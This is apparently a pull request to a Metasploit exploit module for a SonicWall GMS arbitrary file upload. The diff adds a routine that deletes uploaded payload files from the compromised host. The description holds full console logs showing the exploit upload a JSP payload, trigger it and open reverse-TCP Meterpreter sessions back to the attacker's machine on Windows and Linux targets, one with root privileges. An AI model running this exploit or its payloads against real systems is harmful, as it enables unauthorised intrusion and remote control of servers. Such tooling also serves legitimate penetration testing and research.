### PR TITLE
fix REALLY on_new_session issue

### DIFF
--- a/modules/exploits/multi/http/sonicwall_gms_upload.rb
+++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb
@@ -14,7 +14,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	include Msf::Exploit::Remote::HttpClient
 	include Msf::Exploit::EXE
-	include Msf::Exploit::FileDropper
 
 	def initialize(info = {})
 		super(update_info(info,
@@ -70,10 +69,58 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 
-	def on_new_session
-		# on_new_session will force stdapi to load (for Linux meterpreter)
+	def on_new_session(session)
+		if session.type == "meterpreter"
+			session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
+		end
+
+		@dropped_files.delete_if do |file|
+			win_file = file.gsub("/", "\\\\")
+			if session.type == "meterpreter"
+				begin
+					# Meterpreter should do this automatically as part of
+					# fs.file.rm().  Until that has been implemented, remove the
+					# read-only flag with a command.
+					if target['Platform'] == 'win'
+						session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
+					end
+					session.fs.file.rm(file)
+					print_good("Deleted #{file}")
+					true
+				rescue ::Rex::Post::Meterpreter::RequestError
+					false
+				end
+			else
+				cmds = [
+					%Q|attrib.exe -r "#{win_file}"|,
+					%Q|del.exe /f /q "#{win_file}"|,
+					%Q|rm -f "#{file}" >/dev/null|,
+				]
+
+				# We need to be platform-independent here. Since we can't be
+				# certain that {#target} is accurate because exploits with
+				# automatic targets frequently change it, we just go ahead and
+				# run both a windows and a unixy command in the same line. One
+				# of them will definitely fail and the other will probably
+				# succeed. Doing it this way saves us an extra round-trip.
+				session.shell_command_token(cmds.join(" ; "))
+				print_good("Deleted #{file}")
+				true
+			end
+		end
+
+		@dropped_files.each do |f|
+			print_warning("This exploit may require manual cleanup of: #{f}")
+		end
+
 	end
 
+	def register_files_for_cleanup(*files)
+		@dropped_files ||= []
+		@dropped_files += files
+
+		nil
+	end
 
 	def generate_jsp
 		var_hexpath       = Rex::Text.rand_text_alpha(rand(8)+8)


### PR DESCRIPTION
My bad,

Defining an empty on_new_session callback on the module just avoided to jump to FileDropper, where the real issue exists I think! (will ask @jlee-r7 for confirmation)

The problem is executing it with the linux meterpreter:

```
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
```

As fix I've avoided the use of FileDropper and I've moved the deletion routine to the module, which is working fine for both linux and windows platforms

*windows

<pre>
msf  exploit(sonicwall_gms_upload) > set rhost 192.168.1.138
rhost => 192.168.1.138
msf  exploit(sonicwall_gms_upload) > set target 0
target => 0
msf  exploit(sonicwall_gms_upload) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(sonicwall_gms_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.129:4444 
[*] 192.168.1.138:80 - Retrieving Tomcat installation path...
[+] 192.168.1.138:80 - Tomcat installed on C:\GMSVP\Tomcat\
[*] 192.168.1.138:80 - Uploading the payload
[+] 192.168.1.138:80 - Payload successfully uploaded to C:\GMSVP\Tomcat\webapps\appliance\kmVJCThS.txt
[*] 192.168.1.138:80 - Uploading the payload
[+] 192.168.1.138:80 - JSP successfully uploaded to C:\GMSVP\Tomcat\webapps\appliance\pexzncl5.jsp
[*] Triggering payload at '/pexzncl5.jsp' ...
[*] Sending stage (752128 bytes) to 192.168.1.138
[*] Meterpreter session 5 opened (192.168.1.129:4444 -> 192.168.1.138:1109) at 2013-01-24 00:33:38 +0100
[+] Deleted C:\GMSVP\Tomcat\webapps\appliance\kmVJCThS.txt
[+] Deleted C:\GMSVP\Tomcat\webapps\appliance\pexzncl5.jsp

meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

</pre>


*linux

<pre>
^Cmsf  exploit(sonicwall_gms_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.129:4444 
[*] 192.168.1.172:80 - Retrieving Tomcat installation path...
[+] 192.168.1.172:80 - Tomcat installed on /opt/GMSVP/Tomcat/
[*] 192.168.1.172:80 - Uploading the payload
[+] 192.168.1.172:80 - Payload successfully uploaded to /opt/GMSVP/Tomcat/webapps/appliance/WgfUNcmWahclz.txt
[*] 192.168.1.172:80 - Uploading the payload
[+] 192.168.1.172:80 - JSP successfully uploaded to /opt/GMSVP/Tomcat/webapps/appliance/xMT2Up4Y.jsp
[*] Triggering payload at '/xMT2Up4Y.jsp' ...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.1.172
[*] Meterpreter session 4 opened (192.168.1.129:4444 -> 192.168.1.172:44158) at 2013-01-24 00:33:14 +0100
[+] Deleted /opt/GMSVP/Tomcat/webapps/appliance/WgfUNcmWahclz.txt
[+] Deleted /opt/GMSVP/Tomcat/webapps/appliance/xMT2Up4Y.jsp

meterpreter > sysinfo
Computer     : snwl.example.com
OS           : Linux snwl.example.com 2.6.23.8-snwl-VMWare #1 SMP Fri Feb 19 16:18:45 PST 2010 (i686)
Architecture : i686
Meterpreter  : x86/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
meterpreter > exit

</pre>
